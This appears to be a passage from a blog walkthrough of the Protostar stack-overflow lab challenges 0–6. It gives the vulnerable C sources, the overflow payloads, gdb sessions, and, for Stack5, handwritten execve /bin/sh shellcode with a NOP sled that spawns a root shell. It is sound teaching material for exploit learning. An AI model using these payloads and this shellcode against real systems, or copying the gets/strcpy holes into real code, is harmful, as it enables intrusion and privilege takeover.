#include <unistd.h>
#include <stdio.h>
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">volatile</span> <span class="kt">int</span> <span class="n">modified</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="n">modified</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">gets</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">modified</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"you have changed the 'modified' variable</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Try again?</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="write-up">Write-up</h3>
<p>As we can see from the source code, the goal here is to simply modify the value
of the variable <code class="highlighter-rouge">modified</code>, which is located before our buffer. Memory is
written up wards as such:</p>
<p><img src="/assets/images/protostar/stack0.png" alt="memory write" /></p>
<p>This means if we write more than 64 bytes to <code class="highlighter-rouge">buffer</code>, we will overflow into
the variable <code class="highlighter-rouge">modified</code> and change it’s value.</p>
<p>Fortunately, a vulnerable function <code class="highlighter-rouge">gets</code> is used to write input into
<code class="highlighter-rouge">buffer</code>. gets() does not limit the amount of input written, which is why
it is considered unsafe. To abuse this, and overwrite modified, we simply need
to enter 65 characters when asked for input. The 65th byte will be written to
modified.</p>
<p>Let’s use python to do this:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ python -c "print 'A' * 65" | ./stack0
you have changed the 'modified' variable
</code></pre></div></div>
<p>This command simply used python to output the character ‘A’ 65 times, and piped
this output into the input of ./stack0.</p>
<p>As we can see, modified was changed :)</p>
<h2 id="stack1">Stack1</h2>
<h3 id="description-1">Description</h3>
<p>https://exploit-exercises.com/protostar/stack1/</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">volatile</span> <span class="kt">int</span> <span class="n">modified</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="k">if</span><span class="p">(</span><span class="n">argc</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">errx</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">"please specify an argument</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">modified</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">strcpy</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
<span class="k">if</span><span class="p">(</span><span class="n">modified</span> <span class="o">==</span> <span class="mh">0x61626364</span><span class="p">)</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"you have correctly got the variable to the right value</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Try again, you got 0x%08x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">modified</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="write-up-1">Write-up</h3>
<p>This challenge is very much the same as the previous, only this time we need to
set the value of <code class="highlighter-rouge">modified</code> to a specific value, and of course, this time
input is passed via a program parameter.</p>
<p>Last time, we overflowed ‘A’ into modified, making the value 0x000041. This time
let’s try overflowing 4 values; 0x61, 0x62, 0x63, and 0x64.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ ./stack1 $(python -c "print 'A' * 64 + '\x61\x62\x63\x64'")
Try again, you got 0x64636261
</code></pre></div></div>
<blockquote>
<p>Note:
In python we can specify a byte value in a string with ‘\x’ followed by the hex
value we want.</p>
</blockquote>
<p>The value for <code class="highlighter-rouge">modified</code> this time was 0x64636261 when we entered
0x61626364. This is because the machine is <strong>little endian</strong> meaning you store
the <em>least</em> <em>significant</em> byte in the smallest address. This can be visualized
by this challenge as follows:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin<span class="nv">$ </span>./stack1 <span class="k">$(</span>python <span class="nt">-c</span> <span class="s2">"print 'A' * 64 + '</span><span class="se">\x</span><span class="s2">64'"</span><span class="k">)</span>
Try again, you got 0x00000064
user@protostar:/opt/protostar/bin<span class="nv">$ </span>./stack1 <span class="k">$(</span>python <span class="nt">-c</span> <span class="s2">"print 'A' * 64 + '</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">63'"</span><span class="k">)</span>
Try again, you got 0x00006364
user@protostar:/opt/protostar/bin<span class="nv">$ </span>./stack1 <span class="k">$(</span>python <span class="nt">-c</span> <span class="s2">"print 'A' * 64 + '</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">62'"</span><span class="k">)</span>
Try again, you got 0x00626364
</code></pre></div></div>
<p>This means we simply need to reorder the way input is given:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ ./stack1 $(python -c "print 'A' * 64 + '\x64\x63\x62\x61'")
you have correctly got the variable to the right value
</code></pre></div></div>
<p>As we can see, through the buffer overflow on the stack, we were able to modify
the local variable <code class="highlighter-rouge">modified</code> to a specific value :)</p>
<h2 id="stack2">Stack2</h2>
<h3 id="description-2">Description</h3>
<p>https://exploit-exercises.com/protostar/stack2/</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">volatile</span> <span class="kt">int</span> <span class="n">modified</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">variable</span><span class="p">;</span>
<span class="n">variable</span> <span class="o">=</span> <span class="n">getenv</span><span class="p">(</span><span class="s">"GREENIE"</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">variable</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
<span class="n">errx</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">"please set the GREENIE environment variable</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">modified</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">strcpy</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">variable</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">modified</span> <span class="o">==</span> <span class="mh">0x0d0a0d0a</span><span class="p">)</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"you have correctly modified the variable</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Try again, you got 0x%08x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">modified</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="write-up-2">Write-up</h3>
<p>This challenge is very much like the previous, only this time it introduces the
concept of environment variables.</p>
<p>The challenge retrieves input from the environment variable <strong>GREENIE</strong>, and
then uses <code class="highlighter-rouge">strcpy</code> to copy the input into the buffer.</p>
<p>strcpy() is considered a dangerous function because if the destination buffer is
not large enough to hold the source contents, it will overflow. This means if
the data in GREENIE exceeds 64 bytes, <code class="highlighter-rouge">buffer</code> will overflow.</p>
<p>This time around the value we need to set to <code class="highlighter-rouge">modified</code> is 0x0d0a0d0a.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GREENIE=$(python -c "print 'A' * 64 + '\x0a\x0d\x0a\x0d'") ./stack2
you have correctly modified the variable
</code></pre></div></div>
<p>Again, this is the same as the previous, except the value we want to inject is
different and the delivery is through an environment variable rather than a
program argument.</p>
<h2 id="stack3">Stack3</h2>
<h3 id="description-3">Description</h3>
<p>https://exploit-exercises.com/protostar/stack3/</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
</span>
<span class="kt">void</span> <span class="nf">win</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"code flow successfully changed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">volatile</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">fp</span><span class="p">)();</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="n">fp</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">gets</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">fp</span><span class="p">)</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"calling function pointer, jumping to 0x%08x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">fp</span><span class="p">);</span>
<span class="n">fp</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="write-up-3">Write-up</h3>
<p>This challenge truly demonstrates the dangers of being able to control a
variable’s value.</p>
<p>Here, we have to overwrite a 4 byte variable (the same idea as in Stack1 & 2)
only this time, the variable is a function pointer. The value we have to set
it to is the address of the function win.</p>
<p>Input is provided through standard input, the same as in challenge Stack0.</p>
<p>This challenge demonstrates how the execution flow can be controlled when a
stack overflow allows for the control of a function pointer.</p>
<p>First, we must find the address of the function <code class="highlighter-rouge">win</code>:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ objdump -d stack3 | grep "win"
08048424 <win>:
</code></pre></div></div>
<p>objdump reveals that win is at address <strong>0x08048424</strong>. This is the value we want
to write to the overflown variable.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ python -c "print 'A' * 64 + '\x24\x84\x04\x08'" | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
</code></pre></div></div>
<h2 id="stack4">Stack4</h2>
<h3 id="description-4">Description</h3>
<p>https://exploit-exercises.com/protostar/stack4/</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
</span>
<span class="kt">void</span> <span class="nf">win</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"code flow successfully changed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="n">gets</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="write-up-4">Write-up</h3>
<p>This challenge is fun, we have a function that isn’t called, and no function
pointer to overflow. Let’s find a way to call it.</p>
<p>In order to control execution, we have to understand the concept of stack frames
and the calling convention for the system in use in assembly. Here, we’re in a
32 bit Linux environment, and we’re using the <em>cdecl</em> calling convention. Let’s
not dive into the detail of what that means, but let’s examine what it means
concerning our stack. The stack will have a <em>frame</em> set up as such:</p>
<p><img src="/assets/images/protostar/stack5.png" alt="stack5" /></p>
<p>The stack will expand to lower memory, so in order to expand the stack by x,
x will be subtracted by ESP. As seen in Stack1, data is written towards higher
memory.</p>
<p>Now the trick here is, how can we control execution? Well, when a function is
called, the address of the instruction AFTER the call instruction is placed on
the stack, so that we can continue when the function returns. This is known as
the <em>Return Address</em>. When returning from a function, in reality, you’re simply
popping a pointer off the stack into EIP (the <em>Instruction Pointer</em> which
controls execution).</p>
<p>In short, the pointer that is placed into EIP upon return is on the stack.</p>
<p>What happens if we modify this value on the stack before it’s placed into EIP…
we’ll control execution.</p>
<p>Let’s find how many bytes we must overwrite to reach the Return Address:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">(</span>gdb<span class="o">)</span> b <span class="k">*</span>main + 21
<span class="o">(</span>gdb<span class="o">)</span> run
AAAAAAAAAA
<span class="o">(</span>gdb<span class="o">)</span> x/30x <span class="nv">$esp</span>
0xbffff750: 0xbffff760 0xb7ec6165 0xbffff768 0xb7eada75
0xbffff760: 0x41414141 0x41414141 0xbf004141 0x080482c4
0xbffff770: 0xb7ff1040 0x0804958c 0xbffff7a8 0x08048409
0xbffff780: 0xb7fd8304 0xb7fd7ff4 0x080483f0 0xbffff7a8
0xbffff790: 0xb7ec6365 0xb7ff1040 0x080483fb 0xb7fd7ff4
0xbffff7a0: 0x080483f0 0x00000000 0xbffff828 0xb7eadc76
0xbffff7b0: 0x00000001 0xbffff854 0xbffff85c 0xb7fe1848
0xbffff7c0: 0xbffff810 0xffffffff
<span class="o">(</span>gdb<span class="o">)</span> p <span class="nv">$ebp</span>
<span class="nv">$8</span> <span class="o">=</span> <span class="o">(</span>void <span class="k">*</span><span class="o">)</span> 0xbffff7a8
<span class="o">(</span>gdb<span class="o">)</span> x/x <span class="nv">$ebp</span>
0xbffff7a8: 0xbffff828
<span class="o">(</span>gdb<span class="o">)</span> p/d <span class="nv">$ebp</span> - 0xbffff760
<span class="nv">$9</span> <span class="o">=</span> 72
<span class="o">(</span>gdb<span class="o">)</span> p/d <span class="nv">$ebp</span> - 0xbffff760 + 4
<span class="nv">$10</span> <span class="o">=</span> 76
</code></pre></div></div>
<p>When outputting the stack we can see our buffer starts at <strong>0xbffff760</strong>. The
base of or frame is at <strong>0xbffff7a8</strong>, and then we add 4 to skip over the
<em>saved frame pointer</em>.</p>
<p>0xbffff7a8 - 0xbffff760 + 4 = 76</p>
<p>This means after writing 76 bytes, we should start overwriting the Return
Address, and thus controlling where execution will resume when returning.</p>
<p>Now, let’s find the address of the function we want to call.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin<span class="nv">$ </span>objdump <span class="nt">-d</span> stack4 | <span class="nb">grep </span>win
080483f4 <win>:
</code></pre></div></div>
<p>Alright, the address we want to set EIP to is 0x080483f4.</p>
<p>Our attack should thus be as follows:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin<span class="nv">$ </span>python <span class="nt">-c</span> <span class="s2">"print 'A' * 76 + '</span><span class="se">\x</span><span class="s2">f4</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">04</span><span class="se">\x</span><span class="s2">08'"</span> | ./stack4
code flow successfully changed
Segmentation fault
</code></pre></div></div>
<p>Don’t forget, little endian, thus the address of the buffer in the stack turns
into \xf4\x83\x04\x08.</p>
<p>The program may have crashed, but hey, we executed what we wanted to first.</p>
<h2 id="stack5">Stack5</h2>
<h3 id="description-5">Description</h3>
<p>https://exploit-exercises.com/protostar/stack5/</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="n">gets</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="write-up-5">Write-up</h3>
<p>This challenge is a little more realistic in it’s exploitation. From the
code we can see a buffer and a call to <code class="highlighter-rouge">gets</code>, but nothing else is done.</p>
<p>As we saw before, we need to control the value of EIP through the Return
Address.</p>
<p>Now the question is, to where do we make execution return? Well, these
challenges don’t have any security features enabled! So…why not place
executable instructions, shellcode, on the stack. Our Return Address in this
case will simply be the address of the buffer containing shellcode on the stack.</p>
<p>The following is a 21 byte shellcode I wrote that would be perfect for this
situation:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">BITS</span> <span class="mi">32</span>
<span class="kr">global</span> <span class="n">_start</span>
<span class="kr">section</span> <span class="p">.</span><span class="n">text</span>
<span class="c">; execve syscall number</span>
<span class="n">SYS_EXECVE</span> <span class="k">equ</span> <span class="mh">0x0b</span>
<span class="n">_start</span><span class="o">:</span>
<span class="c">;; execve("/bin//sh", 0, 0);</span>
<span class="c">;; eax = syscall number</span>
<span class="c">;; ebx = arg1</span>
<span class="c">;; ecx = arg2</span>
<span class="c">;; edx = arg3</span>
<span class="k">push</span> <span class="n">SYS_EXECVE</span>
<span class="k">pop</span> <span class="n">eax</span>
<span class="k">cdq</span> <span class="c">; 0 edx</span>
<span class="k">xor</span> <span class="n">ecx</span><span class="p">,</span> <span class="n">ecx</span>
<span class="k">push</span> <span class="n">edx</span> <span class="c">; string needs to end in 0</span>
<span class="k">push</span> <span class="mh">0x68732f2f</span> <span class="c">; push 'hs//'</span>
<span class="k">push</span> <span class="mh">0x6e69622f</span> <span class="c">; push 'nib/'</span>
<span class="k">mov</span> <span class="n">ebx</span><span class="p">,</span> <span class="n">esp</span> <span class="c">; pointer to string, top of stack</span>
<span class="k">int</span> <span class="mh">0x80</span> <span class="c">; syscall execve</span>
</code></pre></div></div>
<p>For the byte code:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>objdump <span class="nt">-d</span> linux_x86_execve_sh_21.o
linux_x86_execve_sh_21.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: 6a 0b push <span class="nv">$0xb</span>
2: 58 pop %eax
3: 99 cltd
4: 31 c9 xor %ecx,%ecx
6: 52 push %edx
7: 68 2f 2f 73 68 push <span class="nv">$0x68732f2f</span>
c: 68 2f 62 69 6e push <span class="nv">$0x6e69622f</span>
11: 89 e3 mov %esp,%ebx
13: <span class="nb">cd </span>80 int <span class="nv">$0x80</span>
</code></pre></div></div>
<p>and our raw shellcode:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>\x6a\x0b\x58\x99\x31\xc9\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80
</code></pre></div></div>
<p>Now, let’s determine the address of our buffer on the stack. GDB isn’t great for
this as it modifies the stack, so we’ll create a core dump by causing the
program to crash, and then using GDB to analyse this core dump, we’ll be able
determine the stack location (without modification by GDB).</p>
<p>First let’s enable core dumps. Let’s see where they will be generated:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin<span class="nv">$ </span><span class="nb">cat</span> /proc/sys/kernel/core_pattern
/tmp/core.%s.%e.%p
</code></pre></div></div>
<p>and ensure they can be dumped:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@protostar:/home/user# <span class="nb">cat</span> /proc/sys/fs/suid_dumpable
0
root@protostar:/home/user# <span class="nb">echo</span> <span class="s2">"1"</span> <span class="o">></span> /proc/sys/fs/suid_dumpable
root@protostar:/home/user# <span class="nb">cat</span> /proc/sys/fs/suid_dumpable
1
</code></pre></div></div>
<p>Perfect. Now let’s enable them and generate our core dump!</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin<span class="nv">$ </span><span class="nb">ulimit</span> <span class="nt">-c</span> unlimited
user@protostar:/opt/protostar/bin<span class="nv">$ </span>python <span class="nt">-c</span> <span class="s2">"print 'A' * 100"</span> | ./stack5
Segmentation fault <span class="o">(</span>core dumped<span class="o">)</span>
user@protostar:/opt/protostar/bin<span class="nv">$ </span><span class="nb">ls</span> /tmp/
core.11.stack5.1927
</code></pre></div></div>
<p>Let’s now load the core dump with GDB:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@protostar:/opt/protostar/bin# gdb -q stack5 /tmp/core.11.stack5.1927
Reading symbols from /opt/protostar/bin/stack5...done.
warning: Can't read pathname for load map: Input/output error.
Reading symbols from /lib/libc.so.6...Reading symbols from /usr/lib/debug/lib/libc-2.11.2.so...done.
(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...Reading symbols from /usr/lib/debug/lib/ld-2.11.2.so...done.
(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Core was generated by `./stack5'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb)
</code></pre></div></div>
<p>As we can with the last line, the program terminated with a segfault, it tried
to execute from 0x41414141, the value that got placed into EIP upon return,
proving we successfully modified the Return Address.</p>
<p>Let’s examine the stack:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">(</span>gdb<span class="o">)</span> x/100xw <span class="nv">$esp</span> - 96
0xbffff7a0: 0xbffff7b0 0xb7ec6165 0xbffff7b8 0xb7eada75
0xbffff7b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff7c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff7d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff7e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff7f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff800: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff810: 0x41414141 0xffffff00 0xb7ffeff4 0x08048232
0xbffff820: 0x00000001 0xbffff860 0xb7ff0626 0xb7fffab0
0xbffff830: 0xb7fe1b28 0xb7fd7ff4 0x00000000 0x00000000
0xbffff840: 0xbffff878 0x1222ec67 0x386a9a77 0x00000000
0xbffff850: 0x00000000 0x00000000 0x00000001 0x08048310
0xbffff860: 0x00000000 0xb7ff6210 0xb7eadb9b 0xb7ffeff4
0xbffff870: 0x00000001 0x08048310 0x00000000 0x08048331
0xbffff880: 0x080483c4 0x00000001 0xbffff8a4 0x080483f0
0xbffff890: 0x080483e0 0xb7ff1040 0xbffff89c 0xb7fff8f8
0xbffff8a0: 0x00000001 0xbffff9bb 0x00000000 0xbffff9c4
0xbffff8b0: 0xbffff9d8 0xbffff9e8 0xbffffa09 0xbffffa1c
0xbffff8c0: 0xbffffa26 0xbfffff16 0xbfffff2a 0xbfffff6c
0xbffff8d0: 0xbfffff83 0xbfffff94 0xbfffff9f 0xbfffffa7
0xbffff8e0: 0xbfffffb4 0xbfffffe8 0x00000000 0x00000020
0xbffff8f0: 0xb7fe2414 0x00000021 0xb7fe2000 0x00000010
0xbffff900: 0x078bfbbf 0x00000006 0x00001000 0x00000011
0xbffff910: 0x00000064 0x00000003 0x08048034 0x00000004
0xbffff920: 0x00000020 0x00000005 0x00000007 0x00000007
</code></pre></div></div>
<p>As we can see, our buffer starts at <strong>0xbffff7b0</strong>.</p>
<p>Our payload should thus be as follows:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>'<shellcode>' + '\x90' * (76 - len(shellcode)) + '\xb0\xf7\xff\xbf'
</code></pre></div></div>
<p>Don’t forget, little endian, thus the address of the buffer in the stack turns
into \xb0\xf7\xff\xbf.</p>
<blockquote>
<p>Note:
<code class="highlighter-rouge">0x90</code> is the NOP instruction, or No Operation. It is equivalent to
<code class="highlighter-rouge">xchg eax, eax</code>. It does nothing, but uses up a cycle. It is thus ideal
for building a “sled” to fill up the buffer.</p>
</blockquote>
<p>So with the shellcode mentioned before, at 21 bytes, and the format of our
payload, our final payload should be as follows:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python <span class="nt">-c</span> <span class="s2">"print '</span><span class="se">\x</span><span class="s2">6a</span><span class="se">\x</span><span class="s2">0b</span><span class="se">\x</span><span class="s2">58</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">62</span><span class="se">\x</span><span class="s2">69</span><span class="se">\x</span><span class="s2">6e</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e3</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">80' + '</span><span class="se">\x</span><span class="s2">90' * (76-21) + '</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">f7</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">bf'"</span> <span class="o">></span> /tmp/stack5.pwn
</code></pre></div></div>
<p>Now we have one issue, python is injecting a byte at the end; 0x0a</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@protostar:/opt/protostar/bin# xxd /tmp/stack5.pwn
0000000: 6a0b 5899 31c9 5268 2f2f 7368 682f 6269 j.X.1.Rh//shh/bi
0000010: 6e89 e3cd 8090 9090 9090 9090 9090 9090 n...............
0000020: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0000030: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0000040: 9090 9090 9090 9090 9090 9090 b0f7 ffbf ................
0000050: 0a
</code></pre></div></div>
<p>This will cause our shell to close as soon as it’s loaded. To counter this, we
will execute our payload as follows:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@protostar:/opt/protostar/bin# <span class="o">(</span><span class="nb">cat</span> /tmp/stack5.pwn<span class="p">;</span> <span class="nb">cat</span><span class="o">)</span> | ./stack5
whoami
root
</code></pre></div></div>
<p>And we have a shell :)</p>
<h2 id="stack6">Stack6</h2>
<h3 id="description-6">Description</h3>
<p>https://exploit-exercises.com/protostar/stack6/</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
</span>
<span class="kt">void</span> <span class="nf">getpath</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">ret</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"input path please: "</span><span class="p">);</span> <span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span>
<span class="n">gets</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">__builtin_return_address</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">((</span><span class="n">ret</span> <span class="o">&</span> <span class="mh">0xbf000000</span><span class="p">)</span> <span class="o">==</span> <span class="mh">0xbf000000</span><span class="p">)</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"bzzzt (%p)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">ret</span><span class="p">);</span>
<span class="n">_exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"got path %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">buffer</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">getpath</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="write-up-6">Write-up</h3>
<p>Examining the code we can see they’re filtering Return Addresses starting with
